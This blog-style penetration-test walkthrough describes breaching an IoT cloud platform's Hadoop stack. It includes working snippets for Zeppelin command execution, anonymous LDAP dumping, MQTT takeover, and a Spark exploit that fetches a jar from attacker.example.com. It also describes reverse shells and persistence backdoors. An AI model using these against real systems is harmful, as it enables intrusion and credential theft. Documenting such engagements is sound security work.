Article 70: A Complete Walkthrough of Penetrating an IoT Cloud Platform and Its Hadoop Ecosystem


 Part1 Preface 

Hello everyone, my name is ABC_123. This issue shares a past penetration test of an Internet of Things cloud platform, including lateral movement through the Hadoop ecosystem on the intranet. The intranet included components such as Yarn, MapReduce, Spark, HDFS, Ambari, and Hortonworks, which I rarely encounter in day-to-day work, so this turned into an intermittent three-month process of study and research.

During this period I tried essentially every Hadoop component vulnerability published on the Internet, and with persistent effort I finally achieved solid results. Today I will review and summarize what I learned.


 Part2 Prerequisite Knowledge 

First, a quick introduction to the Hadoop ecosystem; without it, the rest of this article may be hard to follow.

[Figure: overview of the Hadoop ecosystem]

Ambari: If Hadoop is compared to a large technology park with multiple buildings and facilities, including a large number of servers, storage devices, and data processing components, then Ambari is the park's management office. It provides a centralized interface and tools for managing and monitoring all aspects of a Hadoop cluster: cluster configuration and installation, service monitoring and resource usage, resource scheduling and allocation, fault diagnosis, and log analysis.

YARN: YARN is Hadoop's resource manager, responsible for low-level resource management and task scheduling, while Ambari is a cluster management tool used to configure, deploy, and monitor Hadoop clusters and related services.

KDC (Key Distribution Center): This can be compared to the park's access control system. Before entering the Hadoop campus, you present your identity at the gate; once verified, the KDC issues you an access token (a TGT) that lets you use the various facilities and resources on campus. In a Hadoop cluster, the KDC acts as this access control center, ensuring secure communication and resource access within the cluster: just like a campus gate, it ensures that only authorized personnel can enter and use the facilities.
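
To make the TGT analogy concrete, here is a minimal sketch of the ticket flow using the standard MIT Kerberos command-line tools (assumed installed; the principal name is hypothetical):

```python
import subprocess

# Hypothetical principal on a hypothetical realm
principal = "abc123@HADOOP.EXAMPLE.COM"

# kinit asks the KDC to verify our identity and, on success, caches a TGT
# (the "access token" in the campus analogy); it prompts for the password
subprocess.run(["kinit", principal], check=True)

# klist lists the cached TGT; Hadoop services then accept service tickets
# derived from it instead of re-checking credentials every time
subprocess.run(["klist"], check=True)
```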

HDFS: the Hadoop Distributed File System, likened to the campus's data storage center or data warehouse.

Spark: likened to a high-performance computing center or supercomputer on the campus.

MapReduce: splits a data processing job into many subtasks that execute in parallel, assigning them to different nodes in the cluster for computation.
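
As a concrete illustration, here is a minimal single-process word-count sketch of the map/shuffle/reduce model; in a real cluster each map and reduce call would run on a different node:

```python
from collections import defaultdict
from itertools import chain

def map_phase(line):
    # map: emit an intermediate (key, value) pair per word
    return [(word, 1) for word in line.split()]

def reduce_phase(word, counts):
    # reduce: aggregate all values that share a key
    return word, sum(counts)

lines = ["big data on hadoop", "spark and hadoop"]

# shuffle: group intermediate pairs by key before reducing
groups = defaultdict(list)
for word, one in chain.from_iterable(map_phase(l) for l in lines):
    groups[word].append(one)

print(dict(reduce_phase(w, c) for w, c in groups.items()))
# {'big': 1, 'data': 1, 'on': 1, 'hadoop': 2, 'spark': 1, 'and': 1}
```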

The relationship between HDFS, Hive, and HBase is as follows:

[Figure: relationship between HDFS, Hive, and HBase]

The relationship between the Pig, Impala, and Shark components is as follows:

[Figure: relationship between Pig, Impala, and Shark]

To sum up: Pig suits flexible data processing and transformation; Impala focuses on real-time query and analysis of structured data; and Shark/Spark SQL combines data processing with real-time query, offering better performance and interactivity.

The relationship between MapReduce, Spark, and Tez is as follows:

[Figure: relationship between MapReduce, Spark, and Tez]

MapReduce suits offline batch jobs; Spark offers a broad set of data processing functions plus in-memory computing; Tez achieves more efficient job execution through a DAG execution model and optimization strategies. Each has different strengths when processing large-scale data.
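
For contrast with the MapReduce sketch above, here is the same word count as a minimal PySpark sketch (assuming a local pyspark installation), showing the in-memory, chained style that distinguishes Spark:

```python
from pyspark import SparkContext

sc = SparkContext("local[*]", "wordcount")
rdd = sc.parallelize(["big data on hadoop", "spark and hadoop"])

counts = (rdd.flatMap(lambda line: line.split())   # map: one word per record
             .map(lambda word: (word, 1))          # emit (word, 1) pairs
             .reduceByKey(lambda a, b: a + b)      # aggregate by key
             .cache())                             # keep results in memory

print(counts.collect())
sc.stop()
```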

 Part3 Review Process 

First, here is the project flow chart I (ABC_123) drew. The original image was lost; the picture below is a small copy I dug out by "rummaging through boxes and cabinets" and then enlarged with AI image-processing software, and this is about the best clarity that could be recovered. If I find the energy later I may redraw it. Next, I will walk through the key steps of this penetration test.

[Figure: project flow chart, AI-enlarged from a low-resolution copy]

The picture below is a reduced version of the one above; different colors represent different components. Both were made with Maltego, a foreign intelligence-analysis tool, and were recorded during the penetration itself, though I have basically stopped using this tool.

[Figure: reduced version of the flow chart, drawn in Maltego]

  • Gaining a foothold from the external network

Since penetration work against IoT cloud platforms and the Hadoop ecosystem is rare, many of these systems were new to me, and external network assets were very few, so gaining an external foothold was extremely difficult. In the first two weeks we finally established two entry points.

 1 Reverse shell from the Zeppelin backend

Zeppelin is an open source data analysis and visualization platform. It provides an interactive environment in which users can analyze and process data in multiple programming languages, along with rich data visualization features. In this project it was integrated with many components of the Hadoop ecosystem.

First, I searched GitHub for source code belonging to the site's various subdomains and stumbled on a piece of Java code with a cleartext Zeppelin username and password written directly into it (the picture below is a recreation, not the original).

[Figure: recreated screenshot of the leaked Zeppelin credentials in Java source]

Next, I used the username and password to log straight into the Zeppelin backend.

[Figure: the Zeppelin backend after logging in]

Many methods for executing system commands from the Zeppelin backend are published online; the usual execution points are shown in the figure below. In this engagement, however, I remember that none of the public methods worked, so I spent more than a day reading the Zeppelin manual and found another location where arbitrary cmd commands can be executed. I won't disclose it here for now; you can look for it yourself.

[Figure: the publicly known command-execution points in Zeppelin]

In this way, commands were executed through the Zeppelin backend, a Linux reverse shell was obtained directly, and a Socks5 proxy program was injected.
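
Without revealing the undisclosed execution point, here is a hedged sketch of the commonly published route: driving Zeppelin's documented notebook REST API to run a %sh paragraph (this assumes the shell interpreter is enabled; the host and credentials are placeholders):

```python
import requests

ZEPPELIN = "http://zeppelin.example.com:8080"   # hypothetical target
USER, PASSWORD = "leaked_user", "leaked_pass"   # credentials found on GitHub

s = requests.Session()
# Shiro-based login; sets a session cookie on success
s.post(f"{ZEPPELIN}/api/login", data={"userName": USER, "password": PASSWORD})

# Create a throwaway note; the response body carries the new note id
note = s.post(f"{ZEPPELIN}/api/notebook", json={"name": "tmp"}).json()["body"]

# Add a paragraph that uses the %sh interpreter to run a shell command
para = s.post(f"{ZEPPELIN}/api/notebook/{note}/paragraph",
              json={"text": "%sh id"}).json()["body"]

# Run the paragraph synchronously and print its output
r = s.post(f"{ZEPPELIN}/api/notebook/run/{note}/{para}")
print(r.json())
```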

 2 Network-isolation problems in the IoT cloud platform's Docker deployments

This was the other external entry point. An ordinary user could register an account, log in to the backend, and deploy Docker containers, choosing freely among Nginx, Httpd, MySQL, Node.js, and other environments. That gave me an idea: would Docker's network isolation hold up? So I deployed the containers one by one, and none showed security issues. Just as I was about to give up, I deployed a Node.js application whose management interface could execute cmd commands (the picture below is a recreation, not the original).

[Figure: recreated screenshot of the Node.js application's command interface]

As shown in the figure below, the deployed Docker application exposed a cmd command interface that could execute commands and echo the output directly. Moreover, this container could reach the external network, and later penetration showed it could also reach some components of the Hadoop ecosystem directly, such as Hadoop services with unauthorized access, the Spark system, and Zabbix.
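
From inside such a container, this kind of unauthorized access can be checked with plain HTTP probes; a minimal sketch, with hypothetical intranet addresses and the usual default ports:

```python
import requests

NAMENODE = "http://10.0.0.10:50070"     # HDFS NameNode web UI / WebHDFS
RESOURCEMGR = "http://10.0.0.11:8088"   # YARN ResourceManager REST API

# If WebHDFS answers a directory listing without credentials, HDFS is
# exposed to unauthorized access
r = requests.get(f"{NAMENODE}/webhdfs/v1/?op=LISTSTATUS", timeout=5)
print("webhdfs:", r.status_code, r.text[:200])

# Same check for YARN: an open cluster-info endpoint means the
# ResourceManager is reachable and unauthenticated
r = requests.get(f"{RESOURCEMGR}/ws/v1/cluster/info", timeout=5)
print("yarn:", r.status_code, r.text[:200])
```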

[Figure: executing echoed commands inside the deployed Docker container]

  • Maintaining access

A key point here is how to maintain access for three months. The general approach was as follows:

1.  Since the Zeppelin application ran in a non-Docker environment, its reverse Socks5 proxy was relatively stable, and was mainly used for high-traffic operations and intranet vulnerability scanning that consumes system performance.

2.  The Docker Socks5 proxies mainly served as a backup for maintaining access. The containers were very unstable: the proxy dropped as soon as traffic got heavy, and it froze whenever a multi-threaded scanner ran. So I registered multiple accounts and deployed multiple Docker applications in the backend, each with its own Socks5 proxy on a different IP.

3.  The Docker Socks5 proxies were combined with the intranet Zabbix permissions. The administrators later shut down the Zeppelin system from time to time; fortunately Zabbix on the intranet was vulnerable, so I could first reach the intranet through a Docker Socks5 proxy and then run scanning tools from the Zabbix host. Whenever one entrance was closed, I had a plan B.

Summary: leave multiple Socks5 proxy entrances on different proxy IP addresses, use only one or two of them throughout the engagement, and keep one or two entrances that are never touched. A liveness check like the sketch below helps confirm the spare entrances still work.
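
A minimal sketch of such a liveness check using the PySocks library (the proxy addresses and intranet target are hypothetical):

```python
import socks  # PySocks

# Hypothetical list of the Socks5 entrances left behind
PROXIES = [("1.2.3.4", 1080), ("5.6.7.8", 1080)]
TARGET = ("10.0.0.10", 50070)   # an intranet service used to test the route

for host, port in PROXIES:
    s = socks.socksocket()
    s.set_proxy(socks.SOCKS5, host, port)
    s.settimeout(5)
    try:
        s.connect(TARGET)        # success means proxy and route are alive
        print(host, "alive")
    except (socks.ProxyError, OSError) as e:
        print(host, "dead:", e)
    finally:
        s.close()
```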

  • Lateral movement through the Hadoop ecosystem on the intranet

 1 Ambari administrator privileges

The administrator password of this system was eventually guessed: if the website is www.xxx.com, Ambari's weak password was xxx@2022, a domain name + @ + year combination.
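
A minimal sketch of generating this kind of domain + @ + year candidate list (the domain is a placeholder):

```python
from datetime import datetime

def password_candidates(domain: str):
    """Generate weak-password guesses of the form name@year, e.g. xxx@2022."""
    name = domain.split(".")[-2]          # "www.xxx.com" -> "xxx"
    year = datetime.now().year
    for y in range(year - 5, year + 1):   # also try the last few years
        yield f"{name}@{y}"
        yield f"{name.capitalize()}@{y}"

print(list(password_candidates("www.xxx.com")))
```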

[Figure: the Ambari backend with administrator privileges]

 2 KDC (Key Distribution Center) vulnerability

This system was only compromised more than two months into the project. By then I had examined almost every type of Hadoop component except the three most important IPs, those of the KDC. At first I assumed the KDC was unlikely to hold an important vulnerability, but the result was shocking: it yielded a major gain I never expected.

A full port scan of these three IPs showed port 389 open, which I guessed was the LDAP service behind the KDC. I tried an LDAP client, intending only to query the service's naming context, and found myself connected straight into the LDAP database! I remember it vividly; I thought my eyes were deceiving me. The LDAP service allowed anonymous login, a genuinely serious vulnerability.

I then checked the LDAP services of the other two KDC hosts: one also allowed anonymous login, the other did not. I spent a long time browsing the LDAP directory; essentially all the passwords of the entire Hadoop ecosystem were stored there. The Spark system's password was in cleartext, while some components' passwords appeared to be encrypted; I can't recall the details (the screenshot below is from a virtual-machine test environment).
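
An anonymous bind like this can be reproduced with a few lines of Python using the ldap3 library; a minimal sketch with a hypothetical KDC address:

```python
from ldap3 import Server, Connection, ALL, SUBTREE

# Hypothetical KDC host; port 389 was found open during the full port scan
server = Server("10.0.0.20", port=389, get_info=ALL)

# No user or password supplied: this is an anonymous bind
conn = Connection(server, auto_bind=True)
print("anonymous bind OK, naming contexts:", server.info.naming_contexts)

# Browse the directory under the discovered naming context
conn.search(server.info.naming_contexts[0], "(objectClass=*)",
            search_scope=SUBTREE, attributes=["*"], size_limit=50)
for entry in conn.entries:
    print(entry.entry_dn)
```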

[Figure: browsing the anonymous LDAP service, reproduced in a virtual-machine test environment]

In the end, this anonymous-LDAP problem brought down the entire Hadoop ecosystem and was the most serious security issue found on the intranet. Moreover, the Spark administrator's password was reused almost everywhere; many external systems accepted the same account and password.

  • MQTT protocol security issues in external applications

MQTT (Message Queuing Telemetry Transport) is a lightweight communication protocol mainly used for real-time messaging between IoT devices, sensors, and applications, as illustrated in the figure below.

[Figure: overview of the MQTT protocol]

As shown below, the Spark administrator's password obtained earlier could be used to log in to a web application on the external network. The backend contained a function like the one pictured, and pressing F12 revealed the cleartext password (the picture below is a recreation, not the original).

[Figure: recreated screenshot of the cleartext MQTT credentials revealed via F12]

Combining the pieces produced an MQTT connection string: mqtt://uusfwefwfewf:[email protected]:8083/mqtt. The next problem was how to use it. After a lot of research I found the HiveMQ client tool could do it; as shown in the figure below, it reported "connected", meaning the connection succeeded.

[Figure: the HiveMQ client showing "connected"]

The security problem here is that the MQTT endpoint accepted logins from any IP address, with no trusted-source restriction, allowing any attacker to control the IoT devices.
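
The same connection can be scripted with the paho-mqtt library instead of HiveMQ; a minimal sketch assuming MQTT over WebSocket (port 8083 with a /mqtt path usually indicates this), with placeholder host and credentials and the paho-mqtt 1.x callback style:

```python
import paho.mqtt.client as mqtt

# Hypothetical values parsed from a leaked mqtt:// connection string
HOST, PORT, PATH = "broker.example.com", 8083, "/mqtt"
USER, PASSWORD = "leaked_user", "leaked_pass"

def on_connect(client, userdata, flags, rc):
    print("connected, rc =", rc)   # rc == 0 means success
    client.subscribe("#")          # listen to every topic we are allowed

def on_message(client, userdata, msg):
    print(msg.topic, msg.payload[:100])

client = mqtt.Client(transport="websockets")  # paho-mqtt 1.x constructor
client.ws_set_options(path=PATH)
client.username_pw_set(USER, PASSWORD)
client.on_connect = on_connect
client.on_message = on_message
client.connect(HOST, PORT, keepalive=60)
client.loop_forever()
```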

  • Summary of other vulnerabilities

I won't go into the exploitation of the remaining vulnerabilities in detail; I believe everyone is familiar with them. The external network had a MySQL time-based blind injection plus several unauthorized-access and logic vulnerabilities. The intranet had, among others: a ZooKeeper unauthorized-access vulnerability, a Zabbix reverse-shell vulnerability, a Spark code-execution vulnerability, assorted Hadoop unauthorized-access vulnerabilities (some allowing direct download of log files), and a Memcached unauthorized-access vulnerability.
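
As one example, the ZooKeeper unauthorized-access issue can be confirmed with its unauthenticated four-letter admin commands; a minimal sketch with a hypothetical intranet address:

```python
import socket

HOST, PORT = "10.0.0.30", 2181   # 2181 is ZooKeeper's default client port

# Four-letter commands need no authentication when the service allows
# unauthorized access; "stat" and "envi" dump server and environment details
for cmd in (b"stat", b"envi"):
    s = socket.create_connection((HOST, PORT), timeout=5)
    s.sendall(cmd)
    print(cmd.decode(), "->", s.recv(4096).decode(errors="replace")[:200])
    s.close()
```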


The main point here: exploiting the Spark code-execution vulnerability requires loading a jar package, and that jar is best compiled under JDK 1.6 for better compatibility. Also check the Spark system's version and pick the corresponding exploit.
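
For reference, the widely published unauthenticated variant of this attack goes through Spark's standalone REST submission gateway (default port 6066); a hedged sketch with the master address and attacker-hosted jar URL as placeholders, which may or may not match the exact exploit used in this engagement:

```python
import requests

MASTER = "10.0.0.40:6066"                     # hypothetical Spark master
JAR = "http://attacker.example.com/exp.jar"   # attacker-hosted jar,
                                              # ideally built with JDK 1.6

payload = {
    "action": "CreateSubmissionRequest",
    "clientSparkVersion": "2.1.0",            # match the target's version
    "appResource": JAR,
    "mainClass": "Exploit",                   # main class inside exp.jar
    "appArgs": [],
    "environmentVariables": {"SPARK_ENV_LOADED": "1"},
    "sparkProperties": {
        "spark.jars": JAR,
        "spark.app.name": "Exploit",
        "spark.master": f"spark://{MASTER}",
        "spark.driver.supervise": "false",
        "spark.submit.deployMode": "cluster",
    },
}

# The gateway runs the submitted jar on a worker; no credentials required
r = requests.post(f"http://{MASTER}/v1/submissions/create", json=payload)
print(r.status_code, r.text)
```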

db9ae80dd6afe2cd2ce49cdbd96006ce.png

 Part4 Summary 

1.  GitHub source-code leakage became the most important breakthrough for gaining an external foothold.

2.  Poor network isolation of the Docker containers allowed unauthorized access to important Hadoop cluster components and leaked a large number of log files.

3.  The LDAP service of the KDC, the core of the intranet, allowed anonymous login, bringing down the entire Hadoop ecosystem.

4.  The MQTT endpoint had no IP whitelist restricting who could use it, which also caused a serious security issue.

5.  Leaving several extra entrances, with backdoors built from normal application functionality, is a good way to maintain access.


This public account focuses on sharing network security techniques: APT incident analysis, red team attack and defense, blue team analysis, penetration testing, code auditing, and more. One article per week, 99% original; stay tuned.

Contact me: 0day123abc#gmail.com (replace # with @)
